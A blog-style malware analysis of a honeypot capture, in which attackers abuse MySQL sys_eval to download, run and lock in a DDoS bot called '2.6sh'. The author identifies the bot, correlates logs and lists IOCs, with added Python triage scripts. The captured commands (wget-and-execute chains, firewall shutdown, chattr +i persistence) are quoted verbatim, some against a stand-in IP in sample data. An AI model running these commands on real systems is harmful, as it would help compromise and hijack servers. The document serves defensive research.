Spare time with "2.6sh"

"I'm live!" I decided to use some spare time to publish a small post on gathering indicators of compromise from the data collected by my honeypot. I was going to do a small project with my Raspberry Pi, but it seems to have been misplaced... I'll save that tidbit for later.

Today I will do a quick pass over a binary called "2.6sh," but before I can do that one question should be asked: "How did you come across this sample?" Glad you asked... let's get started.

How did you come across this sample?

Currently, I run a honeypot called Dionaea on a machine out in the deep dark internet. Dionaea's main purpose is to expose emulated vulnerable services to attackers, in the hope of obtaining copies of the malware that is being used to exploit other systems in the wild. Some of the services emulated by Dionaea are MSSQL, MySQL, SIP, SMB, FTP, HTTP and so on. This is not the only tool I use for monitoring malicious activity. Another service, which simply monitors the network, is Bro NSM, or simply "Bro" (since renamed Zeek). This is an extremely awesome framework that gives you in-depth analysis of your network traffic. If you have not heard of or given Bro a chance, I highly recommend you try it out. Now that I have gotten that out of the way, you are probably saying "could you please get on with the finding and analysis" :).

The Finding

Looking at the logs, I noticed there were some MySQL connections to the honeypot, so of course I pulled the Bro and Dionaea logs. Given the large amount of MySQL noise seen on the internet, I knew I had to quickly narrow down the interesting artifacts, so I decided to pull the Dionaea logs first. These give not only the brute-forcing logs (username/password combos) but also the MySQL commands with their arguments and a time frame for the execution of those events. One artifact that stuck out on the initial gleaning of the logs was an attempted download of a file named "2.6sh" from a remote IP address.

Pulling from the mysql_command_args table in Dionaea's SQLite database, a search for "2.6sh" reveals the following:

Search for "2.6sh"

sqlite> .schema mysql_command_args  
    CREATE TABLE mysql_command_args (
                mysql_command_arg INTEGER PRIMARY KEY,
                mysql_command INTEGER,
                mysql_command_arg_index NUMBER NOT NULL,
                mysql_command_arg_data TEXT NOT NULL
                -- CONSTRAINT mysql_commands_connection_fkey FOREIGN KEY (connection) REFERENCES connections (connection)
    );

sqlite> select * from mysql_command_args where mysql_command_arg_data like '%2.6sh%';  
25804|43428|0|select sys_eval("wgethttp://;chmod 0755 2.6sh;./2.6sh;")  
25805|43429|0|select sys_eval("chmod 777 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;")  
25806|43430|0|select sys_eval("chmod 0777 2.6sh;chmod u+x 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;chattr +i 2.6sh;")  
25826|43451|0|select sys_eval("wget;chmod 0755 2.6sh;./2.6sh;")  
25827|43452|0|select sys_eval("chmod 777 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;")  
25828|43453|0|select sys_eval("chmod 0777 2.6sh;chmod u+x 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;chattr +i 2.6sh;")  
26320|44439|0|select sys_eval("wget;chmod 0755 2.6sh;./2.6sh;")  
26321|44440|0|select sys_eval("chmod 777 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;")  
26322|44441|0|select sys_eval("chmod 0777 2.6sh;chmod u+x 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;chattr +i 2.6sh;")  

Note that sys_eval is not a built-in MySQL function: it comes from the lib_mysqludf_sys user-defined function library, which the attacker has to load into the server first, so a sys_eval call in the query logs is itself a strong indicator. The chattr +i at the end of the sequence marks the dropped binary immutable, so a plain rm will fail until the attribute is cleared with chattr -i. With this newly discovered information, we can now dive a bit deeper into our data set to see what else Dionaea has captured. Let's start by looking for that IP address in the connections and mysql_command_args tables.

Malicious IP Connections

sqlite> .schema connections  
    CREATE TABLE connections    (
                connection INTEGER PRIMARY KEY,
                connection_type TEXT,
                connection_transport TEXT,
                connection_protocol TEXT,
                connection_timestamp INTEGER,
                connection_root INTEGER,
                connection_parent INTEGER,
                local_host TEXT,
                local_port INTEGER,
                remote_host TEXT,
                remote_hostname TEXT,
                remote_port INTEGER
    );

sqlite> select * from connections where remote_host = '';  

Looking at the output from the connections table, we can narrow things down to the time frames of these events. From those time frames we can then pull the Bro logs to determine whether there was any related traffic besides MySQL. Dionaea stores connection_timestamp as a Unix epoch value, so I created a quick Python script to speed up the conversion.

Timeframe from Connections

#!/usr/bin/env python
# Converts Dionaea's epoch connection_timestamp values to local time.
import argparse
import time

parser = argparse.ArgumentParser(description='Converts Epoch Time to localtime')

parser.add_argument('epochtime', type=float, nargs='+', help='Example: 1444237762.53936')
args = parser.parse_args()

for epoch in args.epochtime:
    # argparse has already converted each value to a float
    print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(epoch)))
python 1442151157.86037 1442151159.6204 1442781286.83636 1442781417.54318 1442791680.71157 1442791688.01481 1444237762.53936 1444237769.40262  
2015-09-13 06:32:37  
2015-09-13 06:32:39  
2015-09-20 13:34:46  
2015-09-20 13:36:57  
2015-09-20 16:28:00  
2015-09-20 16:28:08  
2015-10-07 10:09:22  
2015-10-07 10:09:29  


sqlite> select * from mysql_command_args where mysql_command_arg_data like '%';  
25061|42230|0|select sys_eval("wget;chmod 777 lymm;./lymm;chmod +i lymm;")  
25062|42231|0|select sys_eval("wget;chmod 777 lymm;./lymm;")  
25410|42897|0|select sys_eval("wget;chmod 777 lymm;./lymm;chmod +i lymm;")  
25411|42898|0|select sys_eval("wget;chmod 777 lymm;./lymm;")  
25412|42899|0|system wget  
25415|42902|0|select sys_eval("/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c;chmod 777 lymm;./lymm;")  
25416|42903|0|select sys_eval("wget -O /tmp/lymm;chmod 0755 /lymm;nohup /tmp/lymm > /dev/null 2>&1 &;")  
25417|42904|0|select sys_eval("rm *;curl -o /tmp/rotini;wget -c;chmod 777 /tmp/./lymm;/tmp/./lymm;rm /tmp/*;")  
25537|43124|0|system wget  
25576|43165|0|system wget  
25615|43206|0|system wget  
25804|43428|0|select sys_eval("wget;chmod 0755 2.6sh;./2.6sh;")  
25826|43451|0|select sys_eval("wget;chmod 0755 2.6sh;./2.6sh;")  
26320|44439|0|select sys_eval("wget;chmod 0755 2.6sh;./2.6sh;")  
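The two queries above do the correlation by hand: search mysql_command_args for a string, then look the connection up by remote host and convert its timestamp. The script below does the same join in one pass and pulls the shell commands out of the sys_eval("...") wrapper so the dropped file names, download URLs and chattr +i persistence tricks fall out as a list. This is an added example and not part of the original post or of Dionaea; the connections and mysql_command_args layouts are the ones shown in the .schema output above, while the mysql_commands link table (which ties a command to its connection) is assumed from Dionaea's logsql module. All rows are constructed sample data, with the RFC 5737 address 192.0.2.10 standing in for the attacker IP the post redacts. Timestamps are rendered in UTC rather than local time so they line up with Bro's epoch ts field without timezone guesswork.

```python
#!/usr/bin/env python3
"""Correlate Dionaea MySQL command logs with connections and pull IOCs.

Added example, not Dionaea's own tooling. The connections and
mysql_command_args tables follow the post's .schema output; the
mysql_commands link table is an assumption. All rows are constructed.
"""
import re
import sqlite3
from datetime import datetime, timezone

SCHEMA = """
CREATE TABLE connections (
    connection INTEGER PRIMARY KEY, connection_type TEXT,
    connection_transport TEXT, connection_protocol TEXT,
    connection_timestamp INTEGER, connection_root INTEGER,
    connection_parent INTEGER, local_host TEXT, local_port INTEGER,
    remote_host TEXT, remote_hostname TEXT, remote_port INTEGER);
-- assumed link table: one row per MySQL command, pointing at its connection
CREATE TABLE mysql_commands (
    mysql_command INTEGER PRIMARY KEY, connection INTEGER,
    mysql_command_cmd NUMBER NOT NULL);
CREATE TABLE mysql_command_args (
    mysql_command_arg INTEGER PRIMARY KEY, mysql_command INTEGER,
    mysql_command_arg_index NUMBER NOT NULL,
    mysql_command_arg_data TEXT NOT NULL);
"""

# Constructed sample rows (192.0.2.10 = attacker, 198.51.100.7 = benign scanner).
SAMPLE_CONNECTIONS = [
    (43428, "accept", "tcp", "mysqld", 1442151157.86037, 43428, 43428,
     "10.0.0.5", 3306, "192.0.2.10", "", 51234),
    (43451, "accept", "tcp", "mysqld", 1442781286.83636, 43451, 43451,
     "10.0.0.5", 3306, "192.0.2.10", "", 51300),
    (43500, "accept", "tcp", "mysqld", 1442781300.0, 43500, 43500,
     "10.0.0.5", 3306, "198.51.100.7", "", 40000),
]
SAMPLE_COMMANDS = [  # (mysql_command, connection, cmd); 3 == COM_QUERY
    (43428, 43428, 3), (43429, 43428, 3), (43451, 43451, 3), (43500, 43500, 3),
]
SAMPLE_ARGS = [
    (25804, 43428, 0, 'select sys_eval("wget http://192.0.2.10/2.6sh;chmod 0755 2.6sh;./2.6sh;")'),
    (25805, 43429, 0, 'select sys_eval("chmod 777 2.6sh;./2.6sh;chattr +i 2.6sh;")'),
    (25826, 43451, 0, 'select sys_eval("wget -O /tmp/lymm http://192.0.2.10/lymm;'
                      'chmod 0755 /tmp/lymm;nohup /tmp/lymm > /dev/null 2>&1 &;")'),
    (25900, 43500, 0, 'select @@version_comment limit 1'),
]

SYS_EVAL_RE = re.compile(r'sys_eval\s*\(\s*"(.*)"\s*\)', re.IGNORECASE | re.DOTALL)
URL_RE = re.compile(r"[a-z][a-z0-9+.-]*://[^\s;\"']+", re.IGNORECASE)


def load_sample_db():
    """Build an in-memory SQLite database in Dionaea's layout with sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.executemany("INSERT INTO connections VALUES (?,?,?,?,?,?,?,?,?,?,?,?)", SAMPLE_CONNECTIONS)
    db.executemany("INSERT INTO mysql_commands VALUES (?,?,?)", SAMPLE_COMMANDS)
    db.executemany("INSERT INTO mysql_command_args VALUES (?,?,?,?)", SAMPLE_ARGS)
    return db


def shell_from_query(query):
    """Return the ';'-separated shell commands inside a sys_eval("...") call, or []."""
    m = SYS_EVAL_RE.search(query)
    if not m:
        return []
    return [c.strip() for c in m.group(1).split(";") if c.strip()]


def sys_eval_events(db, remote_host=None):
    """Join args -> commands -> connections and return one event per sys_eval call."""
    sql = """
        SELECT c.remote_host, c.connection_timestamp, a.mysql_command_arg_data
        FROM mysql_command_args a
        JOIN mysql_commands m ON m.mysql_command = a.mysql_command
        JOIN connections c ON c.connection = m.connection
        WHERE a.mysql_command_arg_data LIKE '%sys_eval%'
    """
    params = ()
    if remote_host:
        sql += " AND c.remote_host = ?"
        params = (remote_host,)
    sql += " ORDER BY c.connection_timestamp, a.mysql_command_arg"
    events = []
    for host, ts, query in db.execute(sql, params):
        events.append({
            "remote_host": host,
            "timestamp": ts,
            "utc": datetime.fromtimestamp(ts, timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
            "shell": shell_from_query(query),
        })
    return events


def iocs_from_events(events):
    """Collect download URLs, dropped file paths and files made immutable."""
    urls, files, immutable = set(), set(), set()
    for ev in events:
        for cmd in ev["shell"]:
            urls.update(URL_RE.findall(cmd))
            tok = cmd.split()
            if not tok:
                continue
            if tok[0] == "chmod" and len(tok) >= 3:
                files.add(tok[-1])              # chmod <mode> <file>
            elif tok[0] == "chattr" and "+i" in tok:
                immutable.add(tok[-1])          # chattr +i <file>
            elif tok[0].startswith(("./", "/")):
                files.add(tok[0])               # direct execution
            elif tok[0] == "nohup" and len(tok) > 1:
                files.add(tok[1])               # nohup <file> ...
    return {"urls": sorted(urls), "files": sorted(files), "immutable": sorted(immutable)}


if __name__ == "__main__":
    db = load_sample_db()
    events = sys_eval_events(db, "192.0.2.10")
    for ev in events:
        print(ev["utc"], ev["remote_host"], " ; ".join(ev["shell"]))
    print(iocs_from_events(events))
```

Point the sqlite3.connect call at Dionaea's logsql.sqlite instead of ":memory:" to run this against real data; the LIKE '%sys_eval%' filter is what turns the noisy MySQL brute-force traffic into a short list of post-exploitation events.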

After getting a view of what the honeypot caught, I decided to pull down the "2.6sh" artifact and do some reverse engineering (RE) of the executable.

File Information

$ file 2.6sh
2.6sh: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped  

Now the name "2.6sh" might make sense: given that this binary is an ELF, it might be targeting systems with 2.6.x kernels, and the ".sh"-style name tries to make it look like a Bash shell script being downloaded and executed. One caveat: the "for GNU/Linux 2.2.5" in the file output is the minimum kernel version recorded in the ELF ABI note, so the binary will run on any kernel from 2.2.5 upwards; the "2.6" is only a name. This is of course all speculation until you actually do some static analysis.

Static to IOCs

Loading this binary into IDA Pro, you almost immediately notice that it is not packed and that function names are intact (the file output already said "not stripped"). Looking at the strings view, you notice several artifacts that indicate a DDoS-style bot. These are C++ RTTI type names in Itanium ABI form, a decimal length followed by the class name (so 11CAttackBase is the 11-character class CAttackBase); they live in .rodata rather than the symbol table, which is why such class names survive even in a stripped build. The columns are address, length, type and string:

.rodata:080F18FC 0000000E C 11CAttackBase
.rodata:080F190A 00000010 C 13CPacketAttack
.rodata:080F1928 0000000D C 10CAttackUdp
.rodata:080F1944 0000000D C 10CAttackSyn
.rodata:080F1960 0000000E C 11CAttackIcmp
.rodata:080F197C 0000000D C 10CAttackDns
.rodata:080F1998 0000000D C 10CAttackAmp
.rodata:080F19B4 0000000D C 10CAttackPrx
.rodata:080F19D0 00000012 C 15CAttackCompress
.rodata:080F19F0 0000000D C 10CTcpAttack
.rodata:080F1A0C 0000000B C 9CAttackCc
.rodata:080F1A24 0000000B C 9CAttackIe
.rodata:080F1D0C 00000009 C 7CSerial

Along with the attack class names, you can also glean several IP addresses, update commands, user-agent strings, and possible file names. Typically I would continue to dive deeper and do some RE, but I want to gather quick indicators of compromise (IOCs) before diving into anything that might pique my interest. This helps with pre-research, so that time is not spent looking into something that has already been discovered. Continuing through the strings view, I researched some of the artifacts and found that this binary is associated with a botnet called "BillGates". More information can be found @ and the original source.
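Turning the strings view into something repeatable: the script below walks a blob of .rodata bytes, recovers C++ RTTI class names by checking the length prefix (so 11CAttackBase yields CAttackBase while random digit runs are rejected), and matches the user-agent templates listed in the IOC section against the same bytes. It is an added example, not code from the post or from the bot's authors. The sample bytes are constructed to mimic the strings listed above. The template placeholders are an assumption drawn from their shape and not documented by the post: |S| is taken to be a substituted platform string and |D&a&b| a random integer between a and b, and template_to_regex turns a template into a pattern that can be run over Bro http.log user_agent fields. Keep in mind that the Firefox/18.0 template expands to a real browser UA, so on its own it is a weak indicator; the verdict below requires the attack class names as well.

```python
#!/usr/bin/env python3
"""String-based triage of an unpacked ELF: RTTI class names + known UA templates.

Added example, not from the post or the binary's authors. SAMPLE_RODATA is
constructed; the placeholder semantics of the UA templates are assumed.
"""
import re

# User-agent templates as listed in the post's IOC section.
UA_TEMPLATES = [
    "Mozilla/5.0 (|S|) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/|D&23&25|.|D&0&9|.|D&1000&9000|.|D&10&99| Safari/537.17",
    "Mozilla/5.0 (|S|; rv:18.0) Gecko/20100101 Firefox/18.0",
    "Opera/|D&7&9|.|D&70&90| (|S|) Presto/2.|D&8&18|.|D&90&890| Version/|D&11&12|.|D&10&19|",
]

# Constructed .rodata-like blob: NUL-terminated strings, some of them decoys.
SAMPLE_RODATA = b"".join(s + b"\x00" for s in [
    b"11CAttackBase", b"13CPacketAttack", b"10CAttackUdp", b"10CAttackSyn",
    b"7CSerial", b"2015-09-13 garbage", b"99notninetynine",
    UA_TEMPLATES[1].encode(),
])

# Itanium C++ ABI type_info name: decimal length, then the identifier.
RTTI_RE = re.compile(rb"(?<![0-9A-Za-z_])([1-9][0-9]*)([A-Za-z_][A-Za-z0-9_]*)")
# Assumed placeholder grammar: |S| = substituted string, |D&lo&hi| = random int.
PLACEHOLDER_RE = re.compile(r"\|S\||\|D&(\d+)&(\d+)\|")


def rtti_class_names(data):
    """Return class names whose length prefix matches, in order of appearance."""
    names = []
    for m in RTTI_RE.finditer(data):
        ident = m.group(2).decode()
        if len(ident) == int(m.group(1)) and ident not in names:
            names.append(ident)
    return names


def template_to_regex(tpl):
    """Compile a |S| / |D&lo&hi| template into an anchored regex for real UAs."""
    parts, pos = [], 0
    for m in PLACEHOLDER_RE.finditer(tpl):
        parts.append(re.escape(tpl[pos:m.start()]))
        if m.group(0) == "|S|":
            parts.append(r"[^()]+")            # platform text inside the parens
        else:
            lo, hi = m.group(1), m.group(2)    # digit-count bounds of the range
            parts.append(r"\d{%d,%d}" % (len(lo), len(hi)))
        pos = m.end()
    parts.append(re.escape(tpl[pos:]))
    return re.compile("^" + "".join(parts) + "$")


def triage(data, templates=UA_TEMPLATES):
    """Combine RTTI evidence with literal UA template hits into a verdict."""
    names = rtti_class_names(data)
    attack_classes = [n for n in names if n.startswith("CAttack") or n.endswith("Attack")]
    ua_hits = [t for t in templates if t.encode() in data]
    verdict = "ddos-bot-like" if attack_classes and ua_hits else "inconclusive"
    return {"rtti": names, "attack_classes": attack_classes,
            "ua_templates": ua_hits, "verdict": verdict}


if __name__ == "__main__":
    print(triage(SAMPLE_RODATA))
    rx = template_to_regex(UA_TEMPLATES[0])
    print(bool(rx.match("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 "
                        "(KHTML, like Gecko) Chrome/24.5.1234.56 Safari/537.17")))
```

To run this on a real sample, read the file's bytes (or just its .rodata section) and pass them to triage; the compiled template regexes can be applied to the user_agent column of Bro's http.log to spot the bot's HTTP-flood traffic.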

Conclusion and IOCs

Given that there is already plenty of data out there on this botnet family (if not this particular variant), there is no need for me to RE the binary any further. With that said, enjoy the list of IOCs for further research.

User-agent strings

"Mozilla/5.0 (|S|) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/|D&23&25|.|D&0&9|.|D&1000&9000|.|D&10&99| Safari/537.17"
"Mozilla/5.0 (|S|; rv:18.0) Gecko/20100101 Firefox/18.0"
"Opera/|D&7&9|.|D&70&90| (|S|) Presto/2.|D&8&18|.|D&90&890| Version/|D&11&12|.|D&10&19|"

IP addresses  

3rd Party lookups based on initial network connection

The only results found were for the IP address of the initial event, and they did not contain the above IOCs. No results were found on VXshare. Although this binary hasn't been "found" as of yet, that does not mean a variant doesn't already exist and hasn't been reported.